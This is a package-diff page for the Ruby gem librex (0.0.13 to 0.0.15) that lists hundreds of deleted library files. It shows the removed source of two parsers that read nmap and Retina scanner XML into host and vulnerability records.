RubyGems - librex - Versions diffs - 0.0.13 → 0.0.15 - Mend

librex 0.0.13 → 0.0.15

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (435) hide show

data/README.markdown +1 -1
data/Rakefile +1 -0
metadata +3 -435
data/lib/rex/LICENSE +0 -29
data/lib/rex/arch.rb +0 -103
data/lib/rex/arch/sparc.rb +0 -75
data/lib/rex/arch/sparc.rb.ut.rb +0 -18
data/lib/rex/arch/x86.rb +0 -513
data/lib/rex/arch/x86.rb.ut.rb +0 -93
data/lib/rex/assembly/nasm.rb +0 -104
data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
data/lib/rex/codepage.map +0 -104
data/lib/rex/compat.rb +0 -311
data/lib/rex/constants.rb +0 -113
data/lib/rex/elfparsey.rb +0 -11
data/lib/rex/elfparsey/elf.rb +0 -123
data/lib/rex/elfparsey/elfbase.rb +0 -258
data/lib/rex/elfparsey/exceptions.rb +0 -27
data/lib/rex/elfscan.rb +0 -12
data/lib/rex/elfscan/scanner.rb +0 -207
data/lib/rex/elfscan/search.rb +0 -46
data/lib/rex/encoder/alpha2.rb +0 -31
data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
data/lib/rex/encoder/alpha2/generic.rb +0 -114
data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
data/lib/rex/encoder/ndr.rb +0 -89
data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
data/lib/rex/encoder/nonalpha.rb +0 -61
data/lib/rex/encoder/nonupper.rb +0 -64
data/lib/rex/encoder/xdr.rb +0 -106
data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
data/lib/rex/encoder/xor.rb +0 -69
data/lib/rex/encoder/xor/dword.rb +0 -13
data/lib/rex/encoder/xor/dword_additive.rb +0 -13
data/lib/rex/encoders/xor_dword.rb +0 -35
data/lib/rex/encoders/xor_dword_additive.rb +0 -53
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
data/lib/rex/encoding/xor.rb +0 -20
data/lib/rex/encoding/xor.rb.ts.rb +0 -14
data/lib/rex/encoding/xor/byte.rb +0 -15
data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
data/lib/rex/encoding/xor/dword.rb +0 -21
data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
data/lib/rex/encoding/xor/dword_additive.rb +0 -92
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
data/lib/rex/encoding/xor/exceptions.rb +0 -17
data/lib/rex/encoding/xor/generic.rb +0 -146
data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
data/lib/rex/encoding/xor/qword.rb +0 -15
data/lib/rex/encoding/xor/word.rb +0 -21
data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
data/lib/rex/exceptions.rb +0 -275
data/lib/rex/exceptions.rb.ut.rb +0 -44
data/lib/rex/exploitation/cmdstager.rb +0 -9
data/lib/rex/exploitation/cmdstager/base.rb +0 -175
data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
data/lib/rex/exploitation/egghunter.rb +0 -277
data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
data/lib/rex/exploitation/encryptjs.rb +0 -77
data/lib/rex/exploitation/heaplib.js.b64 +0 -331
data/lib/rex/exploitation/heaplib.rb +0 -94
data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
data/lib/rex/exploitation/obfuscatejs.rb +0 -335
data/lib/rex/exploitation/omelet.rb +0 -320
data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
data/lib/rex/exploitation/opcodedb.rb +0 -818
data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
data/lib/rex/exploitation/seh.rb +0 -92
data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
data/lib/rex/file.rb +0 -112
data/lib/rex/file.rb.ut.rb +0 -16
data/lib/rex/image_source.rb +0 -12
data/lib/rex/image_source/disk.rb +0 -60
data/lib/rex/image_source/image_source.rb +0 -46
data/lib/rex/image_source/memory.rb +0 -37
data/lib/rex/io/bidirectional_pipe.rb +0 -157
data/lib/rex/io/datagram_abstraction.rb +0 -35
data/lib/rex/io/stream.rb +0 -319
data/lib/rex/io/stream_abstraction.rb +0 -197
data/lib/rex/io/stream_server.rb +0 -211
data/lib/rex/job_container.rb +0 -187
data/lib/rex/logging.rb +0 -4
data/lib/rex/logging/log_dispatcher.rb +0 -179
data/lib/rex/logging/log_sink.rb +0 -42
data/lib/rex/logging/sinks/flatfile.rb +0 -55
data/lib/rex/logging/sinks/stderr.rb +0 -43
data/lib/rex/machparsey.rb +0 -9
data/lib/rex/machparsey/exceptions.rb +0 -34
data/lib/rex/machparsey/mach.rb +0 -209
data/lib/rex/machparsey/machbase.rb +0 -408
data/lib/rex/machscan.rb +0 -9
data/lib/rex/machscan/scanner.rb +0 -217
data/lib/rex/mime.rb +0 -9
data/lib/rex/mime/header.rb +0 -77
data/lib/rex/mime/message.rb +0 -144
data/lib/rex/mime/part.rb +0 -20
data/lib/rex/nop/opty2.rb +0 -108
data/lib/rex/nop/opty2.rb.ut.rb +0 -23
data/lib/rex/nop/opty2_tables.rb +0 -300
data/lib/rex/ole.rb +0 -205
data/lib/rex/ole/clsid.rb +0 -47
data/lib/rex/ole/difat.rb +0 -141
data/lib/rex/ole/directory.rb +0 -231
data/lib/rex/ole/direntry.rb +0 -240
data/lib/rex/ole/docs/dependencies.txt +0 -8
data/lib/rex/ole/docs/references.txt +0 -1
data/lib/rex/ole/fat.rb +0 -99
data/lib/rex/ole/header.rb +0 -204
data/lib/rex/ole/minifat.rb +0 -77
data/lib/rex/ole/propset.rb +0 -144
data/lib/rex/ole/samples/create_ole.rb +0 -27
data/lib/rex/ole/samples/dir.rb +0 -35
data/lib/rex/ole/samples/dump_stream.rb +0 -34
data/lib/rex/ole/samples/ole_info.rb +0 -23
data/lib/rex/ole/storage.rb +0 -395
data/lib/rex/ole/stream.rb +0 -53
data/lib/rex/ole/substorage.rb +0 -49
data/lib/rex/ole/util.rb +0 -157
data/lib/rex/parser/arguments.rb +0 -97
data/lib/rex/parser/arguments.rb.ut.rb +0 -67
data/lib/rex/parser/ini.rb +0 -185
data/lib/rex/parser/ini.rb.ut.rb +0 -29
data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
data/lib/rex/parser/ip360_xml.rb +0 -93
data/lib/rex/parser/nessus_xml.rb +0 -118
data/lib/rex/parser/netsparker_xml.rb +0 -94
data/lib/rex/parser/nexpose_xml.rb +0 -131
data/lib/rex/parser/nmap_xml.rb +0 -121
data/lib/rex/parser/retina_xml.rb +0 -109
data/lib/rex/payloads.rb +0 -1
data/lib/rex/payloads/win32.rb +0 -2
data/lib/rex/payloads/win32/common.rb +0 -26
data/lib/rex/payloads/win32/kernel.rb +0 -53
data/lib/rex/payloads/win32/kernel/common.rb +0 -54
data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
data/lib/rex/peparsey.rb +0 -12
data/lib/rex/peparsey/exceptions.rb +0 -32
data/lib/rex/peparsey/pe.rb +0 -212
data/lib/rex/peparsey/pe_memdump.rb +0 -63
data/lib/rex/peparsey/pebase.rb +0 -1680
data/lib/rex/peparsey/section.rb +0 -136
data/lib/rex/pescan.rb +0 -13
data/lib/rex/pescan/analyze.rb +0 -309
data/lib/rex/pescan/scanner.rb +0 -206
data/lib/rex/pescan/search.rb +0 -56
data/lib/rex/platforms.rb +0 -1
data/lib/rex/platforms/windows.rb +0 -51
data/lib/rex/poly.rb +0 -132
data/lib/rex/poly/block.rb +0 -477
data/lib/rex/poly/register.rb +0 -100
data/lib/rex/poly/register/x86.rb +0 -40
data/lib/rex/post.rb +0 -8
data/lib/rex/post/dir.rb +0 -51
data/lib/rex/post/file.rb +0 -172
data/lib/rex/post/file_stat.rb +0 -220
data/lib/rex/post/gen.pl +0 -13
data/lib/rex/post/io.rb +0 -182
data/lib/rex/post/meterpreter.rb +0 -4
data/lib/rex/post/meterpreter/channel.rb +0 -445
data/lib/rex/post/meterpreter/channel_container.rb +0 -54
data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
data/lib/rex/post/meterpreter/client.rb +0 -364
data/lib/rex/post/meterpreter/client_core.rb +0 -274
data/lib/rex/post/meterpreter/dependencies.rb +0 -3
data/lib/rex/post/meterpreter/extension.rb +0 -32
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
data/lib/rex/post/meterpreter/packet.rb +0 -688
data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
data/lib/rex/post/meterpreter/ui/console.rb +0 -137
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
data/lib/rex/post/permission.rb +0 -26
data/lib/rex/post/process.rb +0 -57
data/lib/rex/post/thread.rb +0 -57
data/lib/rex/post/ui.rb +0 -52
data/lib/rex/proto.rb +0 -13
data/lib/rex/proto.rb.ts.rb +0 -8
data/lib/rex/proto/dcerpc.rb +0 -6
data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
data/lib/rex/proto/dcerpc/client.rb +0 -361
data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
data/lib/rex/proto/dcerpc/handle.rb +0 -47
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
data/lib/rex/proto/dcerpc/ndr.rb +0 -72
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
data/lib/rex/proto/dcerpc/packet.rb +0 -253
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
data/lib/rex/proto/dcerpc/response.rb +0 -187
data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
data/lib/rex/proto/dcerpc/uuid.rb +0 -84
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
data/lib/rex/proto/dhcp.rb +0 -7
data/lib/rex/proto/dhcp/constants.rb +0 -33
data/lib/rex/proto/dhcp/server.rb +0 -292
data/lib/rex/proto/drda.rb +0 -5
data/lib/rex/proto/drda.rb.ts.rb +0 -17
data/lib/rex/proto/drda/constants.rb +0 -49
data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
data/lib/rex/proto/drda/packet.rb +0 -252
data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
data/lib/rex/proto/drda/utils.rb +0 -123
data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
data/lib/rex/proto/http.rb +0 -5
data/lib/rex/proto/http.rb.ts.rb +0 -12
data/lib/rex/proto/http/client.rb +0 -821
data/lib/rex/proto/http/client.rb.ut.rb +0 -95
data/lib/rex/proto/http/handler.rb +0 -46
data/lib/rex/proto/http/handler/erb.rb +0 -128
data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
data/lib/rex/proto/http/handler/proc.rb +0 -60
data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
data/lib/rex/proto/http/header.rb +0 -161
data/lib/rex/proto/http/header.rb.ut.rb +0 -46
data/lib/rex/proto/http/packet.rb +0 -407
data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
data/lib/rex/proto/http/request.rb +0 -356
data/lib/rex/proto/http/request.rb.ut.rb +0 -214
data/lib/rex/proto/http/response.rb +0 -90
data/lib/rex/proto/http/response.rb.ut.rb +0 -149
data/lib/rex/proto/http/server.rb +0 -369
data/lib/rex/proto/http/server.rb.ut.rb +0 -79
data/lib/rex/proto/ntlm.rb +0 -7
data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
data/lib/rex/proto/ntlm/base.rb +0 -326
data/lib/rex/proto/ntlm/constants.rb +0 -74
data/lib/rex/proto/ntlm/crypt.rb +0 -415
data/lib/rex/proto/ntlm/exceptions.rb +0 -9
data/lib/rex/proto/ntlm/message.rb +0 -533
data/lib/rex/proto/ntlm/utils.rb +0 -763
data/lib/rex/proto/proxy/socks4a.rb +0 -440
data/lib/rex/proto/rfb.rb +0 -19
data/lib/rex/proto/rfb.rb.ut.rb +0 -37
data/lib/rex/proto/rfb/cipher.rb +0 -84
data/lib/rex/proto/rfb/client.rb +0 -207
data/lib/rex/proto/rfb/constants.rb +0 -52
data/lib/rex/proto/smb.rb +0 -7
data/lib/rex/proto/smb.rb.ts.rb +0 -8
data/lib/rex/proto/smb/client.rb +0 -1952
data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
data/lib/rex/proto/smb/constants.rb +0 -1047
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
data/lib/rex/proto/smb/crypt.rb +0 -36
data/lib/rex/proto/smb/evasions.rb +0 -66
data/lib/rex/proto/smb/exceptions.rb +0 -858
data/lib/rex/proto/smb/simpleclient.rb +0 -306
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
data/lib/rex/proto/smb/utils.rb +0 -103
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
data/lib/rex/proto/sunrpc.rb +0 -1
data/lib/rex/proto/sunrpc/client.rb +0 -195
data/lib/rex/proto/tftp.rb +0 -12
data/lib/rex/proto/tftp/constants.rb +0 -39
data/lib/rex/proto/tftp/server.rb +0 -497
data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
data/lib/rex/script.rb +0 -42
data/lib/rex/script/base.rb +0 -59
data/lib/rex/script/meterpreter.rb +0 -15
data/lib/rex/script/shell.rb +0 -9
data/lib/rex/service.rb +0 -48
data/lib/rex/service_manager.rb +0 -141
data/lib/rex/service_manager.rb.ut.rb +0 -32
data/lib/rex/services/local_relay.rb +0 -423
data/lib/rex/socket.rb +0 -684
data/lib/rex/socket.rb.ut.rb +0 -107
data/lib/rex/socket/comm.rb +0 -119
data/lib/rex/socket/comm/local.rb +0 -412
data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
data/lib/rex/socket/ip.rb +0 -130
data/lib/rex/socket/parameters.rb +0 -345
data/lib/rex/socket/parameters.rb.ut.rb +0 -51
data/lib/rex/socket/range_walker.rb +0 -346
data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
data/lib/rex/socket/ssl_tcp.rb +0 -184
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
data/lib/rex/socket/ssl_tcp_server.rb +0 -122
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
data/lib/rex/socket/subnet_walker.rb +0 -75
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
data/lib/rex/socket/switch_board.rb +0 -278
data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
data/lib/rex/socket/tcp.rb +0 -76
data/lib/rex/socket/tcp.rb.ut.rb +0 -64
data/lib/rex/socket/tcp_server.rb +0 -67
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
data/lib/rex/socket/udp.rb +0 -164
data/lib/rex/socket/udp.rb.ut.rb +0 -44
data/lib/rex/struct2.rb +0 -5
data/lib/rex/struct2/c_struct.rb +0 -181
data/lib/rex/struct2/c_struct_template.rb +0 -39
data/lib/rex/struct2/constant.rb +0 -26
data/lib/rex/struct2/element.rb +0 -44
data/lib/rex/struct2/generic.rb +0 -73
data/lib/rex/struct2/restraint.rb +0 -54
data/lib/rex/struct2/s_string.rb +0 -72
data/lib/rex/struct2/s_struct.rb +0 -111
data/lib/rex/sync.rb +0 -6
data/lib/rex/sync/event.rb +0 -94
data/lib/rex/sync/read_write_lock.rb +0 -176
data/lib/rex/sync/ref.rb +0 -57
data/lib/rex/sync/thread_safe.rb +0 -82
data/lib/rex/test.rb +0 -35
data/lib/rex/text.rb +0 -1149
data/lib/rex/text.rb.ut.rb +0 -190
data/lib/rex/thread_factory.rb +0 -42
data/lib/rex/time.rb +0 -65
data/lib/rex/transformer.rb +0 -115
data/lib/rex/transformer.rb.ut.rb +0 -38
data/lib/rex/ui.rb +0 -21
data/lib/rex/ui/interactive.rb +0 -254
data/lib/rex/ui/output.rb +0 -78
data/lib/rex/ui/output/none.rb +0 -18
data/lib/rex/ui/progress_tracker.rb +0 -96
data/lib/rex/ui/subscriber.rb +0 -149
data/lib/rex/ui/text/color.rb +0 -97
data/lib/rex/ui/text/color.rb.ut.rb +0 -18
data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
data/lib/rex/ui/text/input.rb +0 -117
data/lib/rex/ui/text/input/buffer.rb +0 -75
data/lib/rex/ui/text/input/readline.rb +0 -129
data/lib/rex/ui/text/input/socket.rb +0 -95
data/lib/rex/ui/text/input/stdio.rb +0 -45
data/lib/rex/ui/text/irb_shell.rb +0 -57
data/lib/rex/ui/text/output.rb +0 -80
data/lib/rex/ui/text/output/buffer.rb +0 -61
data/lib/rex/ui/text/output/file.rb +0 -43
data/lib/rex/ui/text/output/socket.rb +0 -43
data/lib/rex/ui/text/output/stdio.rb +0 -40
data/lib/rex/ui/text/progress_tracker.rb +0 -56
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
data/lib/rex/ui/text/shell.rb +0 -328
data/lib/rex/ui/text/table.rb +0 -279
data/lib/rex/ui/text/table.rb.ut.rb +0 -55
data/lib/rex/zip.rb +0 -93
data/lib/rex/zip/archive.rb +0 -184
data/lib/rex/zip/blocks.rb +0 -182
data/lib/rex/zip/entry.rb +0 -104
data/lib/rex/zip/samples/comment.rb +0 -32
data/lib/rex/zip/samples/mkwar.rb +0 -138
data/lib/rex/zip/samples/mkzip.rb +0 -19
data/lib/rex/zip/samples/recursive.rb +0 -58

data/lib/rex/parser/nmap_xml.rb DELETED Viewed

@@ -1,121 +0,0 @@
-require 'rexml/document'
-module Rex
-module Parser
-#
-# Stream parser for nmap -oX xml output
-#
-# Yields a hash representing each host found in the xml stream.  Each host
-# will look something like the following:
-#	{
-#		"status" => "up",
-#		"addrs"  => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
-#		"ports"  => [
-#			{ "portid" => "22", "state" => "closed", ... },
-#			{ "portid" => "80", "state" => "open", ... },
-#			...
-#		]
-#	}
-#
-# Usage:
-# <tt>
-# parser = NmapXMLStreamParser.new { |host|
-#	# do stuff with the host
-# }
-# REXML::Document.parse_stream(File.new(nmap_xml), parser)
-# </tt>
-# -- or --
-# <tt>
-# parser = NmapXMLStreamParser.new
-# parser.on_found_host = Proc.new { |host|
-#	# do stuff with the host
-# }
-# REXML::Document.parse_stream(File.new(nmap_xml), parser)
-# </tt>
-#
-# This parser does not maintain state as well as a tree parser, so malformed
-# xml will trip it up.  Nmap shouldn't ever output malformed xml, so it's not
-# a big deal.
-#
-class NmapXMLStreamParser
-	attr_accessor :on_found_host
-	def initialize(&block)
-		reset_state
-		on_found_host = block if block
-	end
-	def reset_state
-		@host = { "status" => nil, "addrs" => {}, "ports" => [] }
-	end
-	def tag_start(name, attributes)
-		case name
-		when "address"
-			@host["addrs"][attributes["addrtype"]] = attributes["addr"]
-			if (attributes["addrtype"] =~ /ipv[46]/)
-				@host["addr"] = attributes["addr"]
-			end
-		when "osclass"
-			@host["os_vendor"]   = attributes["vendor"]
-			@host["os_family"]   = attributes["osfamily"]
-			@host["os_version"]  = attributes["osgen"]
-			@host["os_accuracy"] = attributes["accuracy"]
-		when "osmatch"
-			if(attributes["accuracy"].to_i == 100)
-				@host["os_match"] = attributes["name"]
-			end
-		when "uptime"
-			@host["last_boot"]   = attributes["lastboot"]
-		when "hostname"
-			if(attributes["type"] == "PTR")
-				@host["reverse_dns"] = attributes["name"]
-			end
-		when "status"
-			# <status> refers to the liveness of the host; values are "up" or "down"
-			@host["status"] = attributes["state"]
-			@host["status_reason"] = attributes["reason"]
-		when "port"
-			@host["ports"].push(attributes)
-		when "state"
-			# <state> refers to the state of a port; values are "open", "closed", or "filtered"
-			@host["ports"].last["state"] = attributes["state"]
-		when "service"
-			# Store any service and script info with the associated port.  There shouldn't
-			# be any collisions on attribute names here, so just merge them.
-			@host["ports"].last.merge!(attributes)
-		when "script"
-			@host["ports"].last["scripts"] ||= {}
-			@host["ports"].last["scripts"][attributes["id"]] = attributes["output"]
-		when "trace"
-			@host["trace"] = {"port" => attributes["port"], "proto" => attributes["proto"], "hops" => [] }
-		when "hop"
-			if @host["trace"]
-				@host["trace"]["hops"].push(attributes)
-			end
-		end
-	end
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		end
-	end
-	# We don't need these methods, but they're necessary to keep REXML happy
-	def text(str); end
-	def xmldecl(version, encoding, standalone); end
-	def cdata; end
-	def comment(str); end
-	def instruction(name, instruction); end
-	def attlist; end
-end
-end
-end

data/lib/rex/parser/retina_xml.rb DELETED Viewed

@@ -1,109 +0,0 @@
-module Rex
-module Parser
-# XXX - Retina XML does not include ANY service/port information export
-class RetinaXMLStreamParser
-	attr_accessor :on_found_host
-	def initialize(on_found_host = nil)
-		reset_state
-		self.on_found_host = on_found_host if on_found_host
-	end
-	def reset_state
-		@state = :generic_state
-		@host  = { 'vulns' => [] }
-		reset_audit_state
-	end
-	def reset_audit_state
-		@audit = { 'refs' => [] }
-	end
-	def tag_start(name, attributes)
-		@state = "in_#{name.downcase}".intern
-	end
-	def text(str)
-		case @state
-		when :in_ip
-			@host["address"] = str
-		when :in_dnsname
-			@host["hostname"] = str.split(/\s+/).first
-		when :in_netbiosname
-			@host["netbios"] = str
-		when :in_mac
-			@host["mac"] = str
-		when :in_os
-			@host["os"] = str
-		when :in_rthid
-			@audit['refs'].push(['RETINA', str])
-		when :in_cve
-			str.split(",").each do |cve|
-				cve = cve.to_s.strip
-				next if cve.empty?
-				pre,val = cve.split('-', 2)
-				next if not val
-				next if pre != "CVE"
-				@audit['refs'].push( ['CVE', val] )
-			end
-		when :in_name
-			@audit['name'] = str
-		when :in_description
-			@audit['description'] = str
-		when :in_risk
-			@audit['risk'] = str
-		when :in_cce
-			@audit['cce'] = str
-		when :in_date
-			@audit['data'] = str
-		end
-	end
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		when "audit"
-			@host['vulns'].push @audit
-			reset_audit_state
-		end
-	end
-	# We don't need these methods, but they're necessary to keep REXML happy
